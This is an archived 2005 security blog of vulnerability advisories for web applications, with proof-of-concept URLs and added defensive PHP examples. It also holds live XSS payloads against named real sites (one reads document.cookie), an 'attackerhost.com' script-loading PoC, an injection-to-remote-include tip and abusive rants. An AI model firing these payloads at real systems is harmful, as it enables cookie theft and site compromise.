by r0t, der4444, cembo, VietMafia

Saturday, December 31, 2005

BugPort Multiple vuln.


r0t's last vuln. report/advisory of 2005!

Vuln. discovered by: r0t
Date: 31 dec. 2005
vendor: www.incogen.com/index.php?type=General&param=bugport
affected version: v1.147 and prior

Product Description:

The BugPort system is an open-source, freely available, web-based system to manage tasks and defects throughout the software development process. BugPort is written with the PHP language using its object-oriented capabilities and is in use by INCOGEN for internal management of software development and QA.


Vuln. Description:

1.
BugPort contains a flaw that allows remote SQL injection attacks. Input passed to the "orderBy", "where" and "devWherePair[1][0]" parameters in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.


/index.php?view=DevelopmentItemResultsView&devWherePair%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=[SQL]

/index.php?view=DevelopmentItemResultsView&where=project_id+%3D+%3F&orderBy=[SQL]

/index.php?view=DevelopmentItemResultsView&where=[SQL]




2.
BugPort contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to multiple parameters (see the PoC below) in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/index.php?view=AddToFavoriteItemSetView&ids%5B0%5D=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_id=9&action=[XSS]

/index.php?view=AddRelatedDevelopmentItemFormView&report_id=[XSS]

/index.php?view=DevelopmentItemResultsView&devWherePair%5B0%5D=state_id+%3C+%3F++AND++MATCH+%28report%2Csubject%2Cdevelplan%2Cfixednotes%2Crepsteps%29+AGAINST+%28%3F++IN+BOOLEAN+MODE%29&devWherePair%5B1%5D%5B0%5D=240&devWherePair%5B1%5D%5B1%5D=[XSS]

/index.php?view=DevelopmentItemResultsView&where=project_id+%3D+%3F&orderBy=priority_id+DESC&binds%5B0%5D=[XSS]



3.

Input passed to the "action" parameter isn't properly sanitised before being returned to the user, which may expose sensitive information about the system configuration and the full installation path.


/index.php?view=AddRelatedDevelopmentItemFormView&report_id=9&action=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.
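Added here as an illustration of what "ensure that input is properly sanitised" means for items 1 and 2 above (this is example code, not BugPort's own; the table and column names are assumptions): the sort column for orderBy is chosen from an allowlist, because an ORDER BY column cannot be bound as a parameter; the filter value goes through a PDO placeholder instead of the request supplying SQL text the way the where and devWherePair parameters do; and anything echoed back to the user is HTML-encoded, which is also the fix the other reflected-XSS advisories on this page call for. The demo runs against an in-memory SQLite table filled with constructed rows.

```php
<?php
// Added example, not BugPort code. Table and column names are assumptions.
declare(strict_types=1);

// ORDER BY cannot take a bound parameter, so the sort column is chosen
// from an allowlist instead of being copied out of the request.
const ORDERABLE_COLUMNS = ['priority_id', 'state_id', 'report_id'];

// Turn a request value such as "priority_id DESC" into a fixed ORDER BY
// clause. Anything that is not an allowlisted column, optionally followed
// by ASC or DESC, is rejected with null.
function safeOrderBy(string $orderBy): ?string
{
    if (!preg_match('/^([a-z_]+)(?:\s+(asc|desc))?$/i', trim($orderBy), $m)) {
        return null;
    }
    $column = strtolower($m[1]);
    if (!in_array($column, ORDERABLE_COLUMNS, true)) {
        return null;
    }
    return 'ORDER BY ' . $column . ' ' . strtoupper($m[2] ?? 'ASC');
}

// The "where"/"devWherePair" parameters let the request supply SQL text.
// Here the SQL lives in the code and the request supplies only a value,
// which PDO binds as data rather than as part of the statement.
function findItemsByProject(PDO $db, string $projectId, string $orderBy): array
{
    $order = safeOrderBy($orderBy);
    if ($order === null) {
        throw new InvalidArgumentException('unsupported sort column');
    }
    $stmt = $db->prepare("SELECT id, report FROM development_items WHERE project_id = ? $order");
    $stmt->execute([$projectId]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Everything reflected into the page (ids, binds, the action name) is
// HTML-encoded first; this is the fix the XSS items ask for.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Demo against an in-memory SQLite table filled with constructed rows.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE development_items (id INTEGER PRIMARY KEY, project_id TEXT, '
    . 'priority_id INTEGER, state_id INTEGER, report_id INTEGER, report TEXT)');
$db->exec("INSERT INTO development_items (project_id, priority_id, state_id, report_id, report) "
    . "VALUES ('p1', 2, 1, 10, 'low'), ('p1', 5, 1, 11, '<b>high</b>')");

// Sorted by an allowlisted column; the report text is encoded on output.
foreach (findItemsByProject($db, 'p1', 'priority_id DESC') as $row) {
    echo $row['id'], ': ', h($row['report']), "\n";
}
// A project id containing quote characters is just a value that matches
// no row, and a sort string that is not a bare allowlisted column never
// reaches the database.
echo count(findItemsByProject($db, "p1' OR '1'='1", 'priority_id')), " rows\n";
var_dump(safeOrderBy('priority_id; --'));
```

The design point is that the request never carries SQL or markup that the application trusts: column names come from a fixed list, values are bound, and output is encoded at the point where it enters the HTML.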

Pridels' statistics

On the last day of the year, looking at the counters on counter.hackers.lv, we can see that the undisputed leader, and not just in recent months, has been this blog.

Here are the statistics for the last months:

Pridels rules


Those who disagree may say that someone is scum and that the blog is crap, but even in terms of visits alone it beats many popular sites, undoubtedly being the most visited blog in Latvia!

In any case, this blog's visitors seem to be security specialists from outside Latvia; in any case, even if the blog died tomorrow, people would still be talking about it all next year. That only confirms that we have achieved what we set out to do and that all of this will have a continuation: one day a forum will appear, maybe a modest site... but the main thing is that the whole atmosphere that reigned here will stay, even if lately you have noticed that it has turned more into a bugtraq than a normal blog. That all goes with the territory; that is the strategy, not the style, we choose. Until the forum is back, I will publish at least the vulnerabilities from various places.

r0t's vulnerabilities:

About the vulnerabilities: many of the vulnerabilities I published concerned scripts that had never been on bugtraq at all and never would have been, because no demos and no downloads were available to ordinary mortals who would not part with sums above 50,000 or even 100,000$.
And even if I only managed to find some elementary XSS bugs in them, nobody could do that before me.
You'll say, so what's the big deal; ok... sit down at a bank's site and we'll see how easily you find vulnerabilities, even XSS.
The smart guys here have said that what I do is a sham, so why is it that 3 of the most popular vuln scanner developers turn to me for advice?
If you can do better than me I'll buy you an ice cream; don't throw words around if you can't do anything yourself!

I'll say in advance: the new site and forum will be found under the domain r00t.it!

I'll also say in advance that the DDOS tool Alberts will come out sometime in January, when cembo has more time and desire!

Friday, December 30, 2005

Dedicated to all the assholes

Today I noticed again that, you see, somebody doesn't like something here: you see, earlier the blog was still readable, I'm a loser, I can't do anything, etc., and I should rather tell them about carding.

So I'll dedicate this post to all the Latvian-speaking assholes who have an itch and can't sit still in their own corner.
Sit on your datuve or build a new hackers lv and squat there; nobody here forces you to read anything or to come here.
And in this specific case: loser, if your knowledge were even at an average level you wouldn't crawl in here and stink at all; you can reproach the little boys you poke around in corners with.
You need warez, go to hack.nite; you care about security, go to netsec; what are you looking for here, halva? Go suck your own dick and you'll have your halva.
If you came here to show how cool you are, then feel free to pick another place to stink, and if you're such a capable pie then go ahead and delete this blog... And I'll even buy you that ice cream for it.
And about carding: I have nothing to do with it... there are special forums for carding and there they will tell you, or all of you, about carding.
So next time the idea comes into your head to shine with your wisdom, first go suck yourself off, then think about whether you're really cool enough to reproach anyone here.

PS. I'm telling in advance all those punishers who will now suddenly imagine that, you see, they'll be the ones to teach little r0t a lesson for his reply to their stinking: you are all scum. And I don't seek respect from your side; this is my home, and if someone comes and spits here, they get the same back.
And everything that is done here is not done for myself, but for the people who need it, and nothing will change because of a couple of underdeveloped individuals.
If you don't respect me I won't respect you; spit here and I'll spit in your face...
Sit in your local network and keep twitching; you have nothing to do here, this is a private blog!

+
Smart guys, big net owners, when you express your opinion, get up the courage for once so that I don't always have to talk to anonymous scum!


If someone didn't get it, I can also repeat myself!

r0t

Kayako SupportSuite multiple vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.kayako.com/supportsuite.php
affected version: v3.00.26 and prior

Product Description:

Kayako SupportSuite offers true integrated Multi-Channel solution allowing you to manage your emails, online issues, chats, self service and issues received by phone. The entire system has been designed to improve productivity and provide seamless integration between all the available modules. With rich AJAX based interface and unmatched features like IRS, VoIP, ViewShare you can be assured that your client issues are not only handled in a timely but efficient manner.


Vuln. Description:

Kayako SupportSuite contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "nav" parameter in "index.php" and to the "Full Name", "Email", "Subject" and "Registered Email" form fields in the "register", "submit" and "lostpassword" modules isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


POC:


/index.php?_m=downloads&_a=view&parentcategoryid=3&pcid=1&nav=[XSS]


For the PoC, manually enter:
''[XSS]

in

/index.php?_m=core&_a=register

Full Name:
Email:

/index.php?_m=tickets&_a=submit

Full Name:
Email:
Subject:

/index.php?_m=core&_a=lostpassword

Registered Email:


+

An attacker can view the full installation path; this flaw exists because input passed to the "_a", "newsid", "downloaditemid" and "kbarticleid" parameters isn't properly sanitised before being returned to the user.

/index.php?_m=news&_a=[FULL PATH]

/index.php?_m=news&_a=viewnews&newsid=[FULL PATH]

/index.php?_m=downloads&_a=downloadfile&downloaditemid=[FULL PATH]

/index.php?_m=knowledgebase&_a=viewarticle&kbarticleid=[FULL PATH]

Solution:
Edit the source code to ensure that input is properly sanitised.

22C3: Private Investigations by r0t



Today @ 22C3 (private investigations, or the EU hackers conference) I met some of my old friends, "The Cracker" and another "-??-", both of whom I know from the crackers scene. -??- was sitting in da one of the corners with his box and showed that he is very busy as always :) The Cracker told me that he is out of cracking and trying to legalize his life...
That's the nice stuff...
There were and will be today some good lectures, but... many of them are uninteresting for me, like the gsm, xbox or terrorism stuff..
About anonymity, there was JAP, etc..
I don't think that in meetings like this one must speak about projects like JAP.
The speakers were ok... In da dark room there were all the time some overlockers... I will never understand why one should give so much time to overlocking a door key lock or a nike key lock...
There were a lot of .net junkies... like a paradise for them.. 24 hours a day chilling with their boxes :)
Bonus stuff: there was a stand for someone who offers ssl stuff; they gave ssl certificates for free.. isn't that amazing? ... yeah... I don't think that is some bonus..
In one area there were some books about liquid life and communism, nazis, marijuana, lsd and other crazy things... (I suppose to give that area an underground meaning)
Ok, too much criticism of the organization, but anyway I had my fun there... learned?
No, just saw some other views and ways to solve problems and to get success.
Today is the last day and I will not go there, but if you are in Berlin you can take a view.

about my English.. I think you already know.

iPei Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.epistream.com/ipei/
affected version:v1.7 and prior

Product Description:

iPei is a simple but elegant little guestbook. The interface is OS X gui-ish, and it comes with mundane features like pass word protection, IP view, entry pruning, commenting, Y! smilies, secure posting, and owners may customize some aspects of displays.


Vuln. Description:

iPei Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the email field parameter in "/index.php?a=sign" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

OoApp Guestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:http://www.ooapp.com/
affected version:2.1 and prior

Product Description:

This is a free php based guestbook for your web site. Easy to setup, no MySQL necessary. Uses a basic flat file. Includes management area, and general area where users can sign the guestbook. This version corrects a problem that came up when someone did not enter their email address into the guestbook.

Vuln. Description:

OoApp Guestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "page" parameter in "home.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

PoC:


/home.php?page=1[XSS]
or
/home.php?do=add_form&page=1[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

AdesGuestbook XSS vuln.

Vuln. discovered by : r0t
Date: 30 dec. 2005
vendor:www.adesdesign.net/php/products_adesguestbook.php
affected version:v2.0 and prior


Product Description:

This is a Guestbook which works with PHP and MySql. Admin Page is a secure page that can be logged in only by the administrator and includes functions such as deleting the record and modifying the record. Records can be deleted/modified by ID, Email and Date. It is developed with customization in mind, so you can easily change the look of the AdesGuestbook according to your website. It uses one single CSS file for the table colors and text format. By changing this CSS file you can apply your choice of colors easily to the whole Guestbook.

Vuln. Description:

AdesGuestbook contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "totalRows_rsRead" parameter in "read.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

PoC:


/read.php?pageNum_rsRead=1&totalRows_rsRead=[XSS]


Solution:
Edit the source code to ensure that input is properly sanitised.

Wednesday, December 28, 2005

Happy New Year !!!

Me and crew wish a happy new year to everyone!

----------------------------------------------------

In the last days of 2005, r0t will be at the European hackers conference, so there will be no vuln. or security reports from r0t in these last days... So, take a break! :)

The other guys will enjoy their holidays around the globe and with family...

New vulns, advisories and board in 2006!


With best wishes r0t,der4444,RaZbh,cembo!!!

Tuesday, December 27, 2005

Sql Injection, take complete advantage

Security/Hack Tip:
If a script stores path information in a DB and that information is later used in include statements; with an sql injection this can lead to remote includes. Obvious, but could be easily overlooked. I just wanted to add that after watching the last video that was posted here.

Php writers: Dont store paths in a DB.

Hackers: If you find a sql injection, check if the script does this.
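The tip above describes the pattern in prose. As an added example (not code from any project on this page), the fragment below shows the risky include beside a form in which the database holds only a lookup key and the code confines every include to a fixed template directory. The table and column names, the slug parameter and the template files are assumptions for the illustration; the demo uses an in-memory SQLite database and a temporary directory so that it runs on its own.

```php
<?php
// Added example, not code from any product on this page. Table, column
// and file names are assumptions.
declare(strict_types=1);

// Risky pattern the tip warns about (shown as a comment only): the row
// itself carries the file to include, so whoever can influence the query
// or the table contents chooses what gets included.
//   $row = $db->query("SELECT tpl_path FROM pages WHERE slug = '$slug'")->fetch();
//   include $row['tpl_path'];

// Hardened form: the database stores a short key, the code owns the
// key-to-file mapping, and every include is confined to TEMPLATE_DIR.
define('TEMPLATE_DIR', sys_get_temp_dir() . '/tpl_demo');
const TEMPLATES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Map a key read from the database to an absolute path inside
// TEMPLATE_DIR, or throw.
function resolveTemplate(string $key): string
{
    if (!isset(TEMPLATES[$key])) {
        throw new RuntimeException('unknown template key');
    }
    $base = realpath(TEMPLATE_DIR);
    $path = realpath(TEMPLATE_DIR . '/' . TEMPLATES[$key]);
    // realpath() returns false for a missing file; the prefix check also
    // guards against a later edit that puts '..' or a URL into TEMPLATES.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('template outside template directory');
    }
    return $path;
}

// The slug is bound as a parameter, so it cannot change the query.
function templateForSlug(PDO $db, string $slug): string
{
    $stmt = $db->prepare('SELECT tpl_key FROM pages WHERE slug = ?');
    $stmt->execute([$slug]);
    $key = $stmt->fetchColumn();
    if ($key === false) {
        throw new RuntimeException('no such page');
    }
    return resolveTemplate((string) $key);
}

// Self-contained demo: an in-memory SQLite table with constructed rows,
// one of which holds a URL as a tampered row might, and one template file.
$db = new PDO('sqlite::memory:', null, null, [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
$db->exec('CREATE TABLE pages (slug TEXT PRIMARY KEY, tpl_key TEXT NOT NULL)');
$db->exec("INSERT INTO pages VALUES ('about', 'home'), ('evil', 'http://example.invalid/x')");
if (!is_dir(TEMPLATE_DIR)) {
    mkdir(TEMPLATE_DIR);
}
file_put_contents(TEMPLATE_DIR . '/home.php', "<?php echo 'home template';\n");

foreach (['about', 'evil', 'missing'] as $slug) {
    try {
        include templateForSlug($db, $slug);   // only ever a file under TEMPLATE_DIR
        echo "\n";
    } catch (RuntimeException $e) {
        echo $slug, ': ', $e->getMessage(), "\n";
    }
}
```

Even if a tampered row or an injected query hands back a URL or a path with ".." in it, nothing is included: the value is only a key into a mapping that lives in the code, and the resolved file must sit under the template directory.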

Sunday, December 25, 2005

Blind MySQL injection database stressing tool

Hi..

Seems someone wins a fight against a blind MySQL injection, with mysql
v3 and magic_quotes enabled.. This is the funny video:
http://www.reversing.org/files/beyond_mysql_injection.avi

ed2k://|file|beyond_mysql_injection.avi|18148274|CD388D581A720AF5C5887117D9279A1A|h=UZFXHKMLGBOBP56FAYF2LLFNSQARNKQW|/

There's also another video here:
http://www.unsec.net/download/bsqlbf.avi

The Magic is in the ending part of the video!

The tool ("sqlbftools") is under the "projects" section and a little
article ("Blind MySQL injection and database stressing") is under the
"essays" section in the page: http://www.reversing.org. The msqlbf perl
script is available at http://www.unsec.net/


Ping!


Greetings to Dsr! and 7a69


PD: Dab told me to say nothing about http://unsec.net


--
kanutron (aka Josepmaria Roca)
* mailinglists at kanutron.net
* http://kanutron.net/
---------------------------------------------------------
"Opinions are like assholes,
everybody has one"
- Harry Callahan -

Friday, December 23, 2005

CommonSpot Content Server vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.paperthin.com/
affected version:4.5 and prior


Product Description:

PaperThin's award-winning technology enables our customers to meet their business objectives. With CommonSpot Content Server, organizations can quickly build and easily maintain dynamic, personalized and sophisticated sites.
CommonSpot scales to meet the Web publishing and content management needs of the most demanding sites, and is used by more than 200 organizations of all sizes worldwide.


Vuln. Description:

CommonSpot Content Server contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "NewWindow" parameter isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

PoC:

XSS:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email-login-info.cfm&errmsg=No%20user%20account%20was%20found%20for%20that%20email%20address.%20%20Please%20try%20again.&bNewWindow=[XSS]

full path:
/loader.cfm?url=/[DIRPATH]/[DIRPATH]/email-login-info.cfm&errmsg=[CODE]


Solution:
Edit the source code to ensure that input is properly sanitised.

Communiqué 4 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.day.com/site/en/index.html
affected version: 4 and prior

Product Description:

Communiqué 4 is the first native JCR (JSR 170) standard compliant enterprise content management solution available on the market today. Communiqué 4 revolutionizes content management by decoupling the content management application from the underlying repository.
Communiqué 4 offers a comprehensive range of fully integrated content solutions that enables leading companies to address all of their global content challenges with one highly scalable, reliable platform.

Vuln. Description:

Input passed to the "query" parameter when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


Solution:
Edit the source code to ensure that input is properly sanitised.

Fatwire UpdateEngine 6.2 multiple XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:http://www.fatwire.com/
affected version:6.2 and prior


Product Description:

UpdateEngine6 is a dynamic content management (DCM) solution to address some of the challenges facing enterprise-class e-business initiatives. Storing content at the field level in the database, allowing for the management of that content through an Web interface, exposing that content to innumerable uses, and publishing static Web pages and dynamic content form the basis of the UpdateEngine6 dCM solution. It enables business users to manage content, shortens installation and implementation time, provides a rich set of Web-based tools and wizards, and easily integrates with legacy systems. Since it is 100% Java, it can integrate with all major application servers, including IBM, BEA, Sun, Oracle and HP, and with all databases. Under an agreement made on May 1, 2002, FatWire's UpdateEngine announced that it will licensed Autonomy's advanced technology for its flagship product, UpdateEngine, to deliver a fully integrated categorization and retrieval solution into its content management software.

Vuln. Description:

UpdateEngine contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "FUELAP_TEMPLATENAME", "EMAIL" and "COUNTRYNAME" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


PoC:

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&PAGE_ID=FWS%5FPAGE%5F1399202&FUELAP_SITEDBID=SITE%5F%2D66&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1404733&COUNTRY_ID=INTSITE%5F1167494&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRYNAME=us&SOURCEPAGE_ID=FWS%5FPAGE%5F1415379&FUELAP_TEMPLATENAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=[XSS]&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=us&FUELAP_SITEDBID=SITE%5F%2D66&

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=fws%5FforgotpasswordForm&SOURCEPAGE_ID=FWS%5FPAGE%5F1150486&PAGE_ID=FWS%5FPAGE%5F1402412&EMAIL=&CAMPAIGN_ID=SFCAMPAIGN%5F%2D1&COUNTRY_ID=INTSITE%5F1167494&ERROR=error&ACTIVITY_ID=FWS%5FWHITEPAPERS%5F1300483&COUNTRYNAME=[XSS]

/UpdateEngine?FUELAP_OP=FUELOP_NewScreen&FUELAP_TEMPLATENAME=[XSS]

Solution:
Edit the source code to ensure that input is properly sanitised.

eggblog vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:www.epicdesigns.co.uk/projects/eggblog.php
affected version:eggblog v2.0 and prior


Product Description:

eggblog is a small, simple, secure and open source blogging package. Anyone with a php and mysql enabled server can make use of our easy to install package to create their own personal blog.


Vuln. Description:


1.
eggblog contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the parameters of "home/search.php" when performing a search isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

2.
It is also possible to disclose the full path to "search.php" by accessing it with an invalid "q" parameter.


Solution:
Edit the source code to ensure that input is properly sanitised.
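The full-path disclosure reported in item 2 above, in the BugPort "action" item and in the "+" section of the Kayako advisory is the same class of failure: an unexpected parameter value makes the application print an error message that includes the installation path. In PHP, which eggblog, Kayako SupportSuite and BugPort are written in, that message is normally a warning or notice rendered because display_errors is on. The following is an added PHP example, not the code of any of those products; the parameter names come from the advisories, while the function names and the sample news table are assumptions.

```php
<?php
// Added example, not eggblog, Kayako or BugPort code: keeping PHP's error
// output from carrying the installation path to the client. Function
// names and the sample news table are assumptions.
declare(strict_types=1);

// 1. Errors go to the server log, never to the response body. These are
//    the runtime equivalents of display_errors=Off and log_errors=On.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// 2. Every warning and notice becomes an exception, so none can fall
//    through to PHP's default printer (whose message includes the script
//    path).
set_error_handler(function (int $no, string $msg, string $file, int $line): bool {
    throw new ErrorException($msg, 0, $no, $file, $line);
});

// 3. One handler turns any uncaught failure into a generic page; message,
//    file and line stay in error_log where the visitor cannot see them.
set_exception_handler(function (Throwable $e): void {
    error_log(sprintf('%s in %s:%d', $e->getMessage(), $e->getFile(), $e->getLine()));
    http_response_code(500);
    echo "An error occurred. Please try again later.\n";
});

// 4. Identifiers are validated before they reach a query or file lookup,
//    so a non-numeric newsid, kbarticleid or q never gets as far as code
//    that would warn about it.
function requireIntParam(array $query, string $name): int
{
    $raw = (string) ($query[$name] ?? '');
    if (!preg_match('/^[1-9][0-9]{0,9}$/', $raw)) {
        throw new InvalidArgumentException("parameter $name must be a positive integer");
    }
    return (int) $raw;
}

// Stand-in for the "viewnews" module; the array replaces the database.
function viewNews(array $query): string
{
    $news = [1 => 'First post', 2 => 'Second post'];   // constructed sample data
    $id = requireIntParam($query, 'newsid');
    if (!isset($news[$id])) {
        throw new RuntimeException("no news item $id");
    }
    return htmlspecialchars($news[$id], ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Constructed requests: a valid id, then the kind of value the advisories
// describe. The second one ends in the exception handler and yields the
// generic message instead of a warning containing the full path.
echo viewNews(['newsid' => '2']), "\n";
echo viewNews(['newsid' => '[FULL PATH]']), "\n";
```

Steps 1 to 3 are a blanket measure that stops the leak whatever code path triggers the warning; step 4 removes the trigger itself for the id-style parameters the advisories name. Both are worth having, because the error handler also covers failures nobody has yet found a request for.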

AlstraSoft EPay Enterprise v3.0 XSS vuln.

Vuln. discovered by : r0t
Date: 23 dec. 2005
vendor:www.alstrasoft.com/epay_enterprise.htm
affected version:v3.0 and prior

Product Description:

EPay Enterprise (formally known as DoPays) has been acquired by AlstraSoft and added into our product line with the growing demand for online payment processing business similar to Paypal and Stormpay.com. The most advance and comprehensive version of our EPay series and in the market at the moment, our Enterprise edition not only allows you to start your own payment processor site EPay operators can also offer escrow services with our built in EZ-Escrow module which is great for auction or freelance websites.
EPay Enterprise is the ideal software solution for those who wish to run their own Paypal, Stormpay, or e-gold type of online business. Epay Enterprise comes with a ready out of the box website with all the features you need to run your own payment gateway system at a low price of only $300.


Vuln. Description:

EPay Enterprise contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to parameters in many fields (see below) isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/enterprise/members/profile.htm
/enterprise/members/card.htm
/enterprise/members/bank.htm
/enterprise/members/subscriptions.htm
/enterprise/members/send.htm
/enterprise/members/request.htm
/enterprise/members/forgot.htm
/enterprise/members/escrow.htm
/enterprise/members/donations.htm
/enterprise/members/products.htm

Solution:
Edit the source code to ensure that input is properly sanitised.

Thursday, December 22, 2005

SECURITY.UZ :)

I always loved those guys who say that they are sec. specialists, and here is one simple example that not everyone who calls themselves a "security specialist" is a real sec. specialist.
Before teaching others, try to educate yourself more; everyone among us can make mistakes because we are humans, but if you call yourself a security specialist then check your own security first.

http://www.security.uz/search/default.asp?q=%22%3E%3Cscript%3Ealert%28%27r0t%20loves%20security%20guys%20who%20are%20not%20secure%20by%20themselfes%27%29%3C%2Fscript%3E&only=bugtraq



PS. Your site may have more bugs; I checked only the simplest.

Yahoo! vuln.

POC:
http://de.mf.news.yahoo.com/mailto?url=http://attackerhost.com/badscript&title=[ATTACKER NICE TEXT TO TARGET]

download.com XSS vuln.

download.com has a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "tg" and "path" parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

http://www.download.com/3120-20_4-0.html?tag=srch&qt=r0t&tg=[XSS]

http://music.download.com/1300-1_32-142.html?tag=mhd_su&path=[XSS]

mp3.com XSS vuln.

in da simplest place:)


mp3.com has a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the "query" parameter in "search.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

live PoC:
http://www.mp3.com/search.php?action=Search&stype=artist&query=%3Cscript%3Ealert(document.cookie)%3C/script%3E&x=31&y=16

WebDB SQL inj vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.loissoftware.com
affected version:1.1 and prior

Product Description:
WebDB is the totally generic, instant online database system - It is possible to create a dynamic web site with no programming knowledge. The software comes with an administration system that allows you to create fields, records, etc. and then decide which fields will appear on the search, results and details pages. You also have total control of the look and feel of the database pages.


Vuln. Description:

WebDB contains a flaw that allows remote SQL injection attacks. Input passed to the search parameter in the search module isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Solution:
Edit the source code to ensure that input is properly sanitised.

WAXTRAPP XSS vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.waxtrapp.com
affected version: 3.0.x; already tested on 3.0.1 and previous versions.

Product Description:

WAXTRAPP is a development platform for fully personalized content distribution, content management, enterprise information portals and online information systems. WAXTRAPP is active since 1997 as a leading innovator in the internet software industry. With customers like TV networks, industry, e-government and healthcare WAXTRAPP has proven to be the most scalable and flexible system around and easily integrates with a wide range of external systems. The number one reason people choose WAXTRAPP is because it brings together inter- intra- extranet functionality with fully personalized portal functionality, where otherwise such projects would require the purchase of many different software products and expensive IT-projects to let them work together. This enables mid-sized companies to implement cost-saving solutions otherwise only affordable for multinationals.

Vuln. Description:

WAXTRAPP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to the search module parameters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


Solution:
Edit the source code to ensure that input is properly sanitised.

WANDSOFT e-SEARCH XSS vuln.

Vuln. discovered by : r0t
Date: 22 dec. 2005
vendor:http://www.wandsoft.com/products/
affected version: latest; it is also used as the search module for WANDSOFT e-Suite 4 and prior.

Product Description:

The WANDSOFT e-SEARCH function allows the content of your website, extranet or intranet to be indexed, so users can find a specific word or topic without having to browse the entire site. Any changes to the site content are automatically updated in the site index, so that WANDSOFT e-SEARCH will always include the latest information in the search results.

The WANDSOFT e-SEARCH functionality enables you to provide better customer care and to reduce the possible frustration of your website visitors – even novice users will be able to locate and go directly to the area they seek immediately.

Why Use WANDSOFT e-SEARCH?

As well as the benefits of using any WANDSOFT e-Suite module, the particular benefits of using WANDSOFT e-SEARCH are:

- Your customers will be delighted to quickly locate the information or page they seek
- Website visitors will remember a positive experience, reflecting well on your organisation
